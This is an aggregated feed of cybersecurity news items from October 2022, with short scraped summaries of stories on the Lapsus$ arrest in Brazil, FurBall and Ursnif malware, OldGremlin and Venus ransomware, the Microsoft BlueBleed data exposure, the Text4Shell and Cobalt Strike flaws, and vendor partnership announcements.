                Sophos has launched new third-party security technology compatibilities with Sophos Managed Detection and Response (MDR) to better detect and remediate attacks across diverse customer and operating environments. The service now integrates telemetry from third-party endpoint, firewall, cloud, identity, email, and other security technologies as part of the Sophos Adaptive Cybersecurity Ecosystem. “The complexity of modern operating environments and the velocity of cyberthreats make it increasingly difficult for most organizations to successfully manage detection and response … More

                The post Sophos expands its MDR offering to include compatibility with third-party cybersecurity products appeared first on Help Net Security.

                Autosummary: Sophos MDR is now compatible with security telemetry from vendors such as Microsoft, CrowdStrike, Palo Alto Networks, Fortinet, Check Point, Rapid7, Amazon Web Services (AWS), Google, Okta, Darktrace, and many others.


                Brazilian Police Arrest Suspected Member of Lapsus$ Hacking Group

                latam
                2022-10-20 https://thehackernews.com/2022/10/brazilian-police-arrest-suspected.html
                The Federal Police of Brazil on Wednesday announced it had arrested an individual for purported links to the notorious LAPSUS$ extortionist gang. The arrest was made as part of a new law enforcement effort, dubbed Operation Dark Cloud, that was launched in August 2022, the agency noted. Not much is known about the suspect other than the fact that the person could be a teenager. The Polícia


                Cybercriminals jailed for cryptocurrency theft, death threats

                ciber
                2022-10-20 https://www.bleepingcomputer.com/news/security/cybercriminals-jailed-for-cryptocurrency-theft-death-threats/
                On Wednesday, two Massachusetts men were sentenced to more than two years in prison each for stealing cryptocurrency in SIM swapping attacks and hijacking their victims’ social media accounts. [...]

                Autosummary: Death threats, hacking, and cryptocurrency theft: According to the court documents, they allegedly stole $200,000 worth of cryptocurrency in one go from an Arizona resident who “publicly communicated with cryptocurrency experts online,” while $100,000 were swiped from a victim in California with close ties to someone who “operated a blockchain-based business.”


                Microsoft “BlueBleed” data breach: customer details and email content exposed

                financial
                2022-10-20 https://grahamcluley.com/microsoft-bluebleed-data-breach-customer-details-and-email-content-exposed/
                Microsoft says that it accidentally exposed sensitive customer data after failing to configure a server securely. But it’s far from happy with the security researchers who told them about the problem...

                Autosummary: The following business transaction data has been exposed:

                • names
                • email addresses
                • email content
                • company name
                • phone numbers

                In addition, Microsoft warned that the exposed data may include “attached files relating to business between a customer and Microsoft or an authorized Microsoft partner.”


                (ISC)² to aid cybersecurity professional development in emerging economies

                ciber
                2022-10-20 https://www.helpnetsecurity.com/2022/10/20/cybersecurity-emerging-economies/

                (ISC)² has signed a Memorandum of Understanding (MOU) with the Korea Internet & Security Agency (KISA) to strengthen cybersecurity professional development in emerging economies. The collaboration will leverage the expertise of both organizations to nurture the global cybersecurity workforce in South Korea and Global Cybersecurity Collaboration Network (CAMP) member countries. Through the MOU, both organizations will collaborate to: expand cybersecurity professional education and training; strengthen professional cybersecurity capabilities; and reinforce the effectiveness of professional education … More

                The post (ISC)² to aid cybersecurity professional development in emerging economies appeared first on Help Net Security.



                Hackers Using New Version of FurBall Android Malware to Spy on Iranian Citizens

                exploits
                2022-10-20 https://thehackernews.com/2022/10/hackers-using-new-version-of-furball.html
                The Iranian threat actor known as Domestic Kitten has been attributed to a new mobile campaign that masquerades as a translation app to distribute an updated variant of an Android malware known as FurBall. "Since June 2021, it has been distributed as a translation app via a copycat of an Iranian website that provides translated articles, journals, and books," ESET researcher Lukas Stefanko said

                Autosummary: Despite this handicap, the Furball malware, in its present form, can retrieve commands from a remote server that allows it to gather contacts, files from external storage, a list of installed apps, basic system metadata, and synced user accounts.


                These 16 Clicker Malware Infected Android Apps Were Downloaded Over 20 Million Times

                exploits
                2022-10-20 https://thehackernews.com/2022/10/these-16-clicker-malware-infected.html
                As many as 16 malicious apps with over 20 million cumulative downloads have been taken down from the Google Play Store after they were caught committing mobile ad fraud. The Clicker malware masqueraded as seemingly harmless utilities like cameras, currency/unit converters, QR code readers, note-taking apps, and dictionaries, among others, in a bid to trick users into downloading them,


                New Ursnif Variant Likely Shifting Focus to Ransomware and Data Theft

                exploits ransomware
                2022-10-20 https://thehackernews.com/2022/10/latest-ursnif-variant-shifts-focus-from.html
                The Ursnif malware has become the latest malware to shed its roots as a banking trojan to revamp itself into a generic backdoor capable of delivering next-stage payloads, joining the likes of Emotet, Qakbot, and TrickBot. "This is a significant shift from the malware’s original purpose to enable banking fraud, but is consistent with the broader threat landscape," Mandiant researchers Sandor "

                Autosummary: "


                Brazilian police arrested a man suspected of being a member of LAPSUS$ gang

                latam
                2022-10-20 https://securityaffairs.co/wordpress/137381/cyber-crime/brazilian-police-arrested-lapsus-member.html

                The Federal Police of Brazil arrested an individual who is suspected of being a member of the notorious LAPSUS$ extortionist group. The Federal Police of Brazil yesterday announced the arrest of an individual suspected of being linked to the LAPSUS$ extortionist gang. The authorities did not disclose info about the individual, it seems that the […]

                The post Brazilian police arrested a man suspected of being a member of LAPSUS$ gang appeared first on Security Affairs.

                "

                Autosummary: Over the last months, the Lapsus$ gang compromised many high-profile companies such as NVIDIA, Samsung, Ubisoft, Mercado Libre, Vodafone, Microsoft, Okta, and Globant. "


                Health system data breach due to Meta Pixel hits 3 million patients

                financial
                2022-10-20 https://www.bleepingcomputer.com/news/security/health-system-data-breach-due-to-meta-pixel-hits-3-million-patients/
                Advocate Aurora Health (AAH), a 26-hospital healthcare system in the states of Wisconsin and Illinois, is notifying its patients of an unintentional data breach that impacts 3,000,000 individuals. [...] "

                Autosummary: "


                OldGremlin hackers use Linux ransomware to attack Russian orgs

                exploits ransomware
                2022-10-20 https://www.bleepingcomputer.com/news/security/oldgremlin-hackers-use-linux-ransomware-to-attack-russian-orgs/
                OldGremlin, one of the few ransomware groups attacking Russian corporate networks, has expanded its toolkit with file-encrypting malware for Linux machines. [...] "

                Autosummary: The malware executable is wrapped using Ultimate Packer (UPX) and appends the .crypt extension to the encrypted files, among them being .RAW, .ZST, .CSV, .IMG, .ISO, SQL, TAR, TGZ, .DAT, .GZ, .DUMP. "


                Ursnif malware switches from bank account theft to initial access

                financial exploits
                2022-10-20 https://www.bleepingcomputer.com/news/security/ursnif-malware-switches-from-bank-account-theft-to-initial-access/
                A new version of the Ursnif malware (a.k.a. Gozi) emerged as a generic backdoor, stripped of its typical banking trojan functionality. [...] "

                Autosummary: POST request sent by Ursnif to the C2 server (Mandiant) The commands supported by the LDR4 variant are the following: Load a DLL module into the current process Retrieve the state of the cmd.exe reverse shell Start the cmd.exe reverse shell Stop the cmd.exe reverse shell "


                OldGremlin Ransomware Targeted Over a Dozen Russian Entities in Multi-Million Scheme

                exploits ransomware
                2022-10-20 https://thehackernews.com/2022/10/oldgremlin-ransomware-targeted-over.html
                A Russian-speaking ransomware group dubbed OldGremlin has been attributed to 16 malicious campaigns aimed at entities operating in the transcontinental Eurasian nation over the course of two and a half years. "The group’s victims include companies in sectors such as logistics, industry, insurance, retail, real estate, software development, and banking," Group-IB said in an exhaustive report "

                Autosummary: "The group’s victims include companies in sectors such as logistics, industry, insurance, retail, real estate, software development, and banking," Group-IB said in an exhaustive report shared with The Hacker News. "The threat actors often pose as well-known companies, including the media group RBC, the legal assistance system Consultant Plus, the company 1C-Bitrix, the Russian Union of Industrialists and Entrepreneurs, and Minsk Tractor Works," Group-IB said. "


                Domestic Kitten campaign spying on Iranian citizens with new FurBall malware

                exploits
                2022-10-20 https://www.welivesecurity.com/2022/10/20/domestic-kitten-campaign-spying-iranian-citizens-furball-malware/

                APT-C-50’s Domestic Kitten campaign continues, targeting Iranian citizens with a new version of the FurBall malware masquerading as an Android translation app

                The post Domestic Kitten campaign spying on Iranian citizens with new FurBall malware appeared first on WeLiveSecurity

                "

                Autosummary: If the threat actor expands the app permissions, it would also be capable of exfiltrating: text from clipboard, device location, SMS messages, contacts, call logs, recorded phone calls, text of all notifications from other apps, device accounts, list of files on device, running apps, list of installed apps, and device info. The Furball variant downloaded from the copycat website can still receive commands from its C&C; however, it can only perform these functions: exfiltrate contact list, get accessible files from external storage, list installed apps, obtain basic information about the device, and get device accounts (list of user accounts synced with device). If the threat actor expands the app permissions, it would also be capable of exfiltrating other types of data from affected phones, such as SMS messages, device location, recorded phone calls, and much more. This version of FurBall has the same surveillance functionality as previous versions; however, the threat actors slightly obfuscated class and method names, strings, logs, and server URIs. "


                Suspected LAPSUS$ group member arrested in Brazil

                latam
                2022-10-20 https://www.malwarebytes.com/blog/news/2022/10/suspected-lapsus-group-member-arrested-in-brazil

                Categories: Cybercrime, News

                Tags: Brasil, Lapsus$, Telegram, Dark Web, data exfiltration, SIM jacking, arrests

                A person suspected of being a member of hacking group Lapsus$ has been arrested by Brazilian police


                The post Suspected LAPSUS$ group member arrested in Brazil appeared first on Malwarebytes Labs.

                "

                Autosummary: LAPSUS$ is also believed to be responsible for invading the systems of Empresa Brasileira de Correios e Telégrafos, and Localiza Rent a Car, as well as several others in South America, the United States and Europe, including Sociedade Independente de Comunicação, a private television channel in Portugal, the group Impresa, Electronic Art, Globant, Nvidia, Okta, Uber, and many others. "


                Venus ransomware targets remote desktop services

                exploits ransomware
                2022-10-20 https://www.malwarebytes.com/blog/news/2022/10/venus-ransomware-targets-remote-desktop-services

                Categories: News

                Tags: Venus Ransomware, RDP, remote desktop services, encrypt, fraud, ransom

                We take a look at reports of Venus ransomware targeting remote desktop services/RDP.


                The post Venus ransomware targets remote desktop services appeared first on Malwarebytes Labs.

                "

                Autosummary: For example samples: one from July/August: 2e2cef71bf99594b54e00d459480e1932e0230fb1cbee24700fbc2f5f631bf12, and one from September: 6d8e2d8f6aeb0f4512a53fe83b2ef7699513ebaff31735675f46d1beea3a8e05 — MalwareHunterTeam (@malwrhunterteam) October 6, 2022. Venus brings bad remote tidings: it seems these attacks very much follow the typical Remote Services/Remote Desktop Protocol (RDP) gameplan. The incredibly overt ransom note, which is somewhat difficult to read given it sports white text on a bright orange background, reads as follows: "We downloaded and encrypted your data. "


                DirectDefense collaborates with Halcyon to protect users against ransomware

                exploits ransomware
                2022-10-20 https://www.helpnetsecurity.com/2022/10/21/directdefense-halcyon/

                As a result of the DirectDefense and Halcyon partnership, DirectDefense will now offer the Halcyon Anti-Ransomware & Endpoint Resilience Platform as part of its Managed Detection and Response (“MDR”) offerings. “Ransomware is on the rise and threat actor groups are becoming increasingly sophisticated. As they evolve, so must your managed security services provider,” said Jim Broome, President, DirectDefense. “The combination of Halcyon’s AI-powered, anti-ransomware engine and our 24/7 MDR security services gives organizations peace of mind that … More

                The post DirectDefense collaborates with Halcyon to protect users against ransomware appeared first on Help Net Security.

                "

                Autosummary: "


                Fines are not enough! Data breach victims want better security

                financial
                2022-10-19 https://www.helpnetsecurity.com/2022/10/19/fines-are-not-enough-data-breach-victims-want-better-security-video/

                Recent research from Thales has found that malware, ransomware, and phishing continue to plague global organizations. 21% have experienced a ransomware attack in the last year, with 43% of those experiencing a significant impact on operations. In this Help Net Security video, Todd Moore, Senior VP, Encryption Products at Thales, discusses how the vast majority of consumers worldwide reported a negative impact on their lives following a data breach. Fraudulent use of their financial information … More

                The post Fines are not enough! Data breach victims want better security appeared first on Help Net Security.

                "

                Autosummary: "


                Sardine Insights enable companies to prevent fraud and increase access to financial services

                financial
                2022-10-19 https://www.helpnetsecurity.com/2022/10/19/sardine-insights/

                Sardine announced a new product offering a real-time, comprehensive view of an entity’s risk based on its history transacting with cryptocurrencies, digital assets, and conventional bank products and services. Called Insights, the service aims to bridge data gaps between financial institutions, fintechs, and crypto companies to strengthen risk management and increase access to all segments of financial services. The number of US adults who own crypto assets will surge to 34 million this year. As … More

                The post Sardine Insights enable companies to prevent fraud and increase access to financial services appeared first on Help Net Security.

                "

                Autosummary: “As payments become increasingly real-time, comprehensive risk assessments on any entity conducting a transaction in TradFi or DeFi is critical in keeping bad actors from causing harm especially when settlement is instantaneous, and there is no option for chargebacks,” said Soups Ranjan, CEO of Sardine. "


                Mandiant Breach Analytics empowers enterprises to gain insight on breach activity in IT environments

                industry
                2022-10-19 https://www.helpnetsecurity.com/2022/10/19/mandiant-breach-analytics/

                Mandiant released Mandiant Breach Analytics for Google Cloud’s Chronicle. Mandiant Breach Analytics combines Mandiant’s threat intelligence with the power of the Google Cloud Chronicle Security Operations suite to help organizations improve security effectiveness and reduce business risk. Threat actors continue to escalate the sophistication and aggressiveness of their attacks, targeting businesses of all sizes and across all industries. With global median dwell time—defined as the duration between the start of a cyber intrusion and when … More

                The post Mandiant Breach Analytics empowers enterprises to gain insight on breach activity in IT environments appeared first on Help Net Security.

                "

                Autosummary: Mandiant Breach Analytics can empower organizations to: Strengthen cyber defense posture: Fueled by the Mandiant Intel Grid, Breach Analytics leverages up-to-the-moment breach intelligence and expertise gleaned from Mandiant’s world-class incident responders, analysts and threat hunters, enabling organizations to put that intelligence into action without timely and costly security engineering. "


                iDealwine suffers a data breach

                financial
                2022-10-19 https://www.helpnetsecurity.com/2022/10/19/idealwine-data-breach/

                Popular international fine wine online retailer iDealwine has suffered a data breach during the past weekend, and has yet to reveal the number of customers affected. Its e-shop is still offline, showing a brief explanatory message, and the firm has informed all potentially affected customers about the cyberattack via email (also via the company blog). iDealwine data breach: What happened? iDealwine is an e-merchant based in France, with offices in Hong Kong and London. It … More

                The post iDealwine suffers a data breach appeared first on Help Net Security.

                "

                Autosummary: "


                CISA Warns of Critical Flaws Affecting Industrial Appliances from Advantech and Hitachi

                industry
                2022-10-19 https://thehackernews.com/2022/10/cisa-warns-of-critical-flaws-affecting.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released two Industrial Control Systems (ICS) advisories pertaining to severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances. This consists of three weaknesses in the R-SeeNet monitoring solution, successful exploitation of which "could result in an unauthorized attacker remotely deleting files on the "

                Autosummary: "


                Microsoft Azure SFX bug let hackers hijack Service Fabric clusters

                exploits
                2022-10-19 https://www.bleepingcomputer.com/news/security/microsoft-azure-sfx-bug-let-hackers-hijack-service-fabric-clusters/
                Attackers could exploit a now-patched spoofing vulnerability in Service Fabric Explorer to gain admin privileges and hijack Azure Service Fabric clusters. [...] "

                Autosummary: "


                Chinese Hackers Targeting Online Casinos with GamePlayerFramework Malware

                exploits
                2022-10-19 https://thehackernews.com/2022/10/chinese-hackers-targeting-online.html
                An advanced persistent threat (APT) group of Chinese origin codenamed DiceyF has been linked to a string of attacks aimed at online casinos in Southeast Asia for years. Russian cybersecurity company Kaspersky said the activity aligns with another set of intrusions attributed to Earth Berberoka (aka GamblingPuppet) and DRBControl, citing tactical and targeting similarities as well as the abuse of "

                Autosummary: These plugins, in turn, make it possible to steal cookies from Google Chrome and Mozilla Firefox browsers, capture keystroke and clipboard data, set up virtual desktop sessions, and even remotely connect to the machine over SSH. "


                A Quick Guide for Small Cybersecurity Teams Looking to Invest in Cyber Insurance

                ciber
                2022-10-19 https://thehackernews.com/2022/10/a-quick-guide-for-small-cybersecurity.html
                In the world of insurance providers and policies, cyber insurance is a fairly new field. And many security teams are trying to wrap their heads around it. What is it and do they need it? And how much time will they spend researching how to integrate cyber insurance into their strategy? For small security teams, this is particularly challenging as they contend with limited resources. Luckily, "

                Autosummary: The market varies widely, with policies often determined by insurance providers, but the primary forms of cyber insurance include: Network security systems policies which cover the cost of lawyers, IT forensic services, data restoration, breach notifications and communications, and more when a data breach, malware infection or ransomware incident occurs. Cyber insurance, also referred to as cyber liability insurance or data breach insurance, can help mitigate the costs of cyber attacks – an expense that is growing at an alarming rate. "


                Researchers share of FabriXss bug impacting Azure Fabric Explorer

                exploits
                2022-10-19 https://securityaffairs.co/wordpress/137349/hacking/azure-azure-fabric-fabrixss.html

                Cybersecurity researchers published technical details about a now-patched FabriXss flaw that impacts Azure Fabric Explorer. Orca Security researchers have released technical details about a now-patched FabriXss vulnerability, tracked as CVE-2022-35829 (CVSS 6.2), that impacts Azure Fabric Explorer. An attacker can exploit the vulnerability to gain administrator privileges on the cluster. In order to exploit this flaw, an […]

                The post Researchers share of FabriXss bug impacting Azure Fabric Explorer appeared first on Security Affairs.

                "

                Autosummary: The experts describe a step-by-step procedure to trigger the flaw along with a screen recording: FabriXss Vulnerability – Orca Research Pod | Orca Security. Below is the timeline for this vulnerability: Orca reported the vulnerability to MSRC via MSRC VDP on August 11, 2022; MSRC reached back and started investigating the issue on August 16, 2022; MSRC worked towards removing the older version on September 1, 2022; call with MSRC and Orca Team discussing the vulnerability on September 6, 2022; MSRC assigned CVE-2022-35829 for the vulnerability on October 11, 2022; fix was included in Microsoft October 2022 Patch Tuesday on October 11, 2022. "


                The missed link between Ransom Cartel and REvil ransomware gangs

                exploits ransomware
                2022-10-19 https://securityaffairs.co/wordpress/137328/cyber-crime/ransom-cartel-links-revil.html

                Researchers at Palo Alto Network’s Unit 42 linked the Ransom Cartel ransomware operation to the REvil ransomware operations. Researchers at Palo Alto Network’s Unit 42 have linked the relatively new Ransom Cartel ransomware operation with the notorious REvil cybercrime gang. The REvil group was one of the most active ransomware gangs in the first half […]

                The post The missed link between Ransom Cartel and REvil ransomware gangs appeared first on Security Affairs.

                "

                Autosummary: “This method of generating session secrets was documented by researchers at Amossys back in 2020; however, their analysis focused on an updated version of Sodinokibi/REvil ransomware, indicating a direct overlap between the REvil source code and the latest Ransom Cartel samples,” continues the report. “Based on the fact that the Ransom Cartel operators clearly have access to the original REvil ransomware source code, yet likely do not possess the obfuscation engine used to encrypt strings and hide API calls, we speculate that the operators of Ransom Cartel had a relationship with the REvil group at one point, before starting their own operation.” "


                Brazil arrests suspect linked to the Lapsus$ hacking group

                latam
                2022-10-19 https://www.bleepingcomputer.com/news/security/brazil-arrests-suspect-linked-to-the-lapsus-hacking-group/
                Today, the Brazilian Federal Police arrested a Brazilian suspect in the city of Feira de Santana, Bahia, believed to be part of the Lapsus$ extortion gang. [...] "

                Autosummary: Although it’s still unclear how many active members the gang still has, it is believed that Lapsus$ has affiliates worldwide and, based on what Telegram chats seem to suggest, they speak multiple languages, including English, Russian, Turkish, German, and Portuguese. "


                Microsoft data breach exposes customers’ contact info, emails

                financial
                2022-10-19 https://www.bleepingcomputer.com/news/security/microsoft-data-breach-exposes-customers-contact-info-emails/
                Microsoft said today that some of its customers’ sensitive information was exposed by a misconfigured Microsoft server accessible over the Internet. [...] "

                Autosummary: Per SOCRadar’s analysis, these files contain customer emails, SOW documents, product offers, POC (Proof of Concept) works, partner ecosystem details, invoices, project details, customer product price list, POE documents, product orders, signed customer documents, internal comments for customers, sales strategies, and customer asset documents. "


                Man scammed IRL for a phone he sold online

                financial
                2022-10-19 https://www.malwarebytes.com/blog/news/2022/10/man-scammed-irl-for-a-phone-he-sold-online

                Categories: News

                Tags: scam, fake, fraud, sale, selling, bank transfer, app, phone, mobile, social media

                We take a look at reports of scammers using fake bank transfer apps to make it look as though they’ve bought your for-sale item.


                The post Man scammed IRL for a phone he sold online appeared first on Malwarebytes Labs.

                "

                Autosummary: The continued problem of fake payment apps: This isn’t the first time this has happened, and law enforcement is definitely taking an interest in these fake app payment scams. And yet… Fake apps, real items: Chris Gray of Howdon possesses an IT degree, and considers himself to be tech-savvy. When the money still hadn’t arrived after 20 minutes, Gray did a quick Google and, seeing it could take “up to 2 hours” for the transaction to show up, sent the buyer on his way. "


                Ransomware attack freezes newspaper printing system

                exploits
                2022-10-19 https://www.malwarebytes.com/blog/news/2022/10/ransomware-attack-freezes-newspaper-printing-system

                Categories: News, Ransomware

                Stimme Mediengruppe, a German media group, halted production of printed newspapers after a ransomware attack on Friday.


                The post Ransomware attack freezes newspaper printing system appeared first on Malwarebytes Labs.

                "

                Autosummary: Speaking to BleepingComputer, Uwe Ralf Heer, editor-in-chief of Heilbronn Stimme, said the attack hit the entire Stimme Mediengruppe media group, of which Heilbronn Stimme is a member. "


                DeadBolt ransomware gang tricked into giving victims free decryption keys

                exploits ransomware
                2022-10-19 https://www.malwarebytes.com/blog/news/2022/10/deadbolt-ransomware-gang-tricked-into-giving-victims-free-decryption-keys

                Categories: News, Ransomware

                Tags: Dutch, law enforcement, DeadBolt, ransomware, decryption keys, responders.nu

                With the idea provided by an incident response company, Dutch police used a clever trick to get 150 DeadBolt ransomware decryption keys for free.


                The post DeadBolt ransomware gang tricked into giving victims free decryption keys appeared first on Malwarebytes Labs.

                "

                Autosummary: With the idea provided by an incident response company, Dutch police used a clever trick to get 150 DeadBolt ransomware decryption keys for free. As a countermeasure, QNAP pushed out an automatic, forced update with firmware containing the latest security updates to protect against the attackers’ DeadBolt ransomware, which annoyed part of its userbase. "


                Inspira and Trellix join forces to provide integrated approach to cybersecurity

                ciber
                2022-10-19 https://www.helpnetsecurity.com/2022/10/20/inspira-trellix/

                Inspira and Trellix partnership extends XDR from Trellix with Inspira’s multivendor tools and broad set of services provided to clients through the company’s Integrated Cyber Threat Management approach, adding prediction and protection to the detection and response capabilities that Trellix’s tool provides. Extended Detection and Response (XDR) is new to the market, with various degrees of XDR solution variants; clients are often confused about where to start. Enterprise clients can invest in multiple solutions and … More

                The post Inspira and Trellix join forces to provide integrated approach to cybersecurity appeared first on Help Net Security.

                "

                Autosummary: "


                Strivacity and TransUnion collaborate to help customers with identity verification processes

                government
                2022-10-19 https://www.helpnetsecurity.com/2022/10/20/strivacity-transunion/

                The Strivacity and TransUnion partnership combines Strivacity’s native identity verification capabilities with TransUnion’s TruValidate Global Fraud Solutions. Strivacity customers can now validate the identity of users using TransUnion, which provides a comprehensive view of each consumer by linking proprietary data, personal data, device identifiers, and online behaviors. Identity verification remains a persistent challenge for customer sign-in journeys. Unlike workforce identity management, where the user’s identity is known to the employer, customers’ identities are unknown to … More

                The post Strivacity and TransUnion collaborate to help customers with identity verification processes appeared first on Help Net Security.

                "

                Autosummary: "


                Text4Shell, a remote code execution bug in Apache Commons Text library

                exploits
                2022-10-19 https://securityaffairs.co/wordpress/137359/security/text4shell-apache-commons-text.html

                Researcher discovered a remote code execution vulnerability in the open-source Apache Commons Text library. GitHub’s threat analyst Alvaro Munoz discovered a remote code execution vulnerability, tracked as CVE-2022-42889, in the open-source Apache Commons Text library. Apache Commons Text is a library focused on algorithms working on strings. The vulnerability, dubbed “Text4Shell,” is an unsafe script evaluation issue […]

                The post Text4Shell, a remote code execution bug in Apache Commons Text library appeared first on Security Affairs.

                "

                Autosummary: “These lookups are: – “script” – execute expressions using the JVM script execution engine (javax.script) – “dns” – resolve dns records – “url” – load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used.” wrote the developer in the Apache mailing list. "


                Don’t get scammed when buying tickets online

                financial
                2022-10-19 https://www.welivesecurity.com/2022/10/19/dont-get-scammed-buying-tickets-online/

                With hot-ticket events firmly back on the agenda, scammers selling fake tickets online have also come out in force

                The post Don’t get scammed when buying tickets online appeared first on WeLiveSecurity

                "

                Autosummary: In fact, not only could someone just copy the barcode and go to the event with a printout, or a photo on their phone, the only time the victims would realize they have been scammed is when they arrive at the venue and, should they not be the first one in, the ticket won’t work. With hot-ticket events firmly back on the agenda, scammers selling fake tickets online have also come out in force. As the events scene slowly came back to life in 2022, the clamor for tickets to festivals and gigs surged massively. "


                Brazil arrests suspect believed to be a Lapsus$ gang member

                latam
                2022-10-19 https://www.bleepingcomputer.com/news/security/brazil-arrests-suspect-believed-to-be-a-lapsus-gang-member/
                Today, the Brazilian Federal Police arrested a Brazilian suspect in the city of Feira de Santana, Bahia, believed to be part of the Lapsus$ extortion gang. [...] "

                Autosummary: Although it’s still unclear how many active members the gang still has, it is believed that Lapsus$ has affiliates worldwide and, based on what Telegram chats seem to suggest, they speak multiple languages, including English, Russian, Turkish, German, and Portuguese. "


                For auto dealerships, cybersecurity is more essential than ever

                ciber
                2022-10-18 https://www.helpnetsecurity.com/2022/10/18/auto-retailers-cyberattacks/

                Cybercriminals are getting craftier as auto retailers continue to fall victim to well-disguised cyberattacks. According to the second annual dealership cybersecurity study by CDK Global, 15% of dealers have experienced a cybersecurity incident in the past year. Of those impacted, 85% of the occurrences were due to sophisticated phishing attempts concealed as legitimate emails that resulted in data breaches, IT-related business interruptions and loss of revenue. “Consumers are continuously shifting to a more mobile environment, … More

                The post For auto dealerships, cybersecurity is more essential than ever appeared first on Help Net Security.

                "

                Autosummary: Dealers plan to update cybersecurity measures to combat top cyberthreats, such as email phishing, ransomware, lack of employee awareness, theft of business data, PC virus or malware, and stolen or weak passwords. "


                Critical RCE Vulnerability Discovered in Popular Cobalt Strike Hacking Software

                exploits
                2022-10-18 https://thehackernews.com/2022/10/critical-rce-vulnerability-discovered.html
                HelpSystems, the company behind the Cobalt Strike software platform, has released an out-of-band security update to address a remote code execution vulnerability that could allow an attacker to take control of targeted systems. Cobalt Strike is a commercial red-team framework that's mainly used for adversary simulation, but cracked versions of the software have been actively abused by ransomware

                Autosummary:


                CVE-2022-28762: Zoom for macOS contains a debugging port misconfiguration

                exploits
                2022-10-18 https://securityaffairs.co/wordpress/137266/security/zoom-macos-cve-2022-28762.html

                Video messaging company Zoom fixed a high-severity vulnerability, tracked as CVE-2022-28762, in Zoom Client for Meetings for macOS. Zoom Client for Meetings for macOS (Standard and for IT Admin) is affected by a debugging port misconfiguration. The issue, tracked as CVE-2022-28762, received a CVSS severity score of 7.3. When the camera mode rendering context is […]

                The post CVE-2022-28762: Zoom for macOS contains a debugging port misconfiguration appeared first on Security Affairs.

                Autosummary: The company also addressed a medium-severity issue, tracked as CVE-2022-28761 (CVSS score 6.5), that impacts the Zoom On-Premise Meeting Connector Multimedia Router (MMR).


                Chinese "Spyder Loader" Malware Spotted Targeting Organizations in Hong Kong

                exploits
                2022-10-18 https://thehackernews.com/2022/10/chinese-spyder-loader-malware-spotted.html
                The China-aligned espionage-focused actor dubbed Winnti has set its sights on government organizations in Hong Kong as part of an ongoing campaign dubbed Operation CuckooBees. Active since at least 2007, Winnti (aka APT41, Barium, Bronze Atlas, and Wicked Panda) is the name designated to a prolific cyber threat group that carries out Chinese state-sponsored espionage activity, predominantly

                Autosummary: The threat actor's campaigns have targeted healthcare, telecoms, high-tech, media, agriculture, and education sectors, with infection chains primarily relying on spear-phishing emails with attachments to initially break into the victims' networks.


                Cryptocurrency and Ransomware — The Ultimate Friendship

                exploits ransomware
                2022-10-18 https://thehackernews.com/2022/10/ryptocurrency-and-ransomware-ultimate.html
                Both cryptocurrency and ransomware are nothing new in the digital world; both have been there for a very long time, which was enough for them to find common pieces for starting their relationship. Ransomware can be like a virtual car that works on all types of fuels, and crypto is the one that is currently most recommended. No one can argue that 2020 was the year of ransomware in the cyber world

                Autosummary: Ransomware is a malware type that encrypts the victim's files, whether it's a random user or an organization, leading to denying them access to those files on their personal devices. Starting with taking cybersecurity awareness training courses which we call the ultimate layer of protection, followed by multilayers such as the first and most valuable layer that works on the DNS level, which is the first gate between you and the cybercriminal. SafeDNS has updated categories having DGA, Cryptojacking and others as part of the Security group, and we definitely recommend trying out threat protection & giving a free 15-day trial of web filtering a go.


                Critical Remote Code Execution issue impacts popular post-exploitation toolkit Cobalt Strike

                exploits
                2022-10-18 https://securityaffairs.co/wordpress/137284/hacking/cobalt-strike-rce.html

                HelpSystems, the company that developed the Cobalt Strike platform, addressed a critical remote code execution vulnerability in its software. HelpSystems, the company that developed the commercial post-exploitation toolkit Cobalt Strike, addressed a critical remote code execution vulnerability, tracked as CVE-2022-42948, in its platform. The company released an out-of-band security update to address the remote code […]

                The post Critical Remote Code Execution issue impacts popular post-exploitation toolkit Cobalt Strike appeared first on Security Affairs.

                Autosummary: HelpSystems, the company that developed the commercial post-exploitation toolkit Cobalt Strike, addressed a critical remote code execution vulnerability, tracked as CVE-2022-42948, in its platform.


                Ransom Cartel linked to notorious REvil ransomware operation

                exploits ransomware
                2022-10-18 https://www.bleepingcomputer.com/news/security/ransom-cartel-linked-to-notorious-revil-ransomware-operation/
                Threat analysts have connected the pieces that link the Ransom Cartel RaaS (ransomware-as-a-service) to the REvil gang, one of the most notorious and prolific ransomware groups in recent years. [...]

                Autosummary: Ransom Cartel operations: There are also similarities in the tactics, techniques, and procedures (TTPs) used by REvil and Ransom Cartel, such as double-extortion attacks, large ransom demands, and a data leak site to pressure victims into paying a ransom. Finally, the threat actors shut down VMs, terminate all related processes, and encrypt VMware-related files (.log, .vmdk, .vmem, .vswp and .vmsn).


                FBI: Scammers likely to target US Student Loan Debt Relief applicants

                financial
                2022-10-18 https://www.bleepingcomputer.com/news/security/fbi-scammers-likely-to-target-us-student-loan-debt-relief-applicants/
                The FBI has released a warning that scammers may be targeting individuals seeking to enroll in the Federal Student Aid program to steal their personal information, payment details, and money. [...]

                Autosummary:


                How to spot a scam

                financial
                2022-10-18 https://www.malwarebytes.com/blog/news/2022/10/how-to-spot-a-scam

                Categories: News

                Categories: Personal

                In every scam no matter how sophisticated or how amateur, there are two red flags.

                The post How to spot a scam appeared first on Malwarebytes Labs.

                Autosummary: On a recent Lock and Code podcast, Cindy Liebes, Chief Cybersecurity Evangelist for the Cybercrime Support Network, spelled out just how patient these scammers can be: "It can take months, it can take years, but invariably they will seek to get money." The virtual ties that bind us are international now: Our public telephone numbers, social media accounts, email addresses, messaging apps, dating profiles, and even our physical mailboxes, can all be reached by any criminal and con artist from anywhere in the world. Though undoubtedly useful, the advice is often specific to a single campaign or type of scam: Watch out for fake DHL emails; Beware of SMS messages from the Royal Mail; Don’t open invoices from unknown senders; Check the spelling and links in emails; Reverse image search too-good-to-be-true dating profile pics, and so on.


                Cervello collaborates with ST Engineering to provide cybersecurity for rail operational networks

                ciber
                2022-10-18 https://www.helpnetsecurity.com/2022/10/19/cervello-st-engineering/

                Cervello announced a partnership with ST Engineering to incorporate ST Engineering’s cybersecurity services as part of Cervello’s patented rail security solution for rail operators and infrastructure managers. This partnership, which has already proven its value by securing the operations of one of the busiest rail networks in APAC, enhances Cervello’s ability to offer and support its solution globally. “We are pleased to officially announce our already proven strategic cooperation with ST Engineering, a proven technology … More

                The post Cervello collaborates with ST Engineering to provide cybersecurity for rail operational networks appeared first on Help Net Security.

                Autosummary:

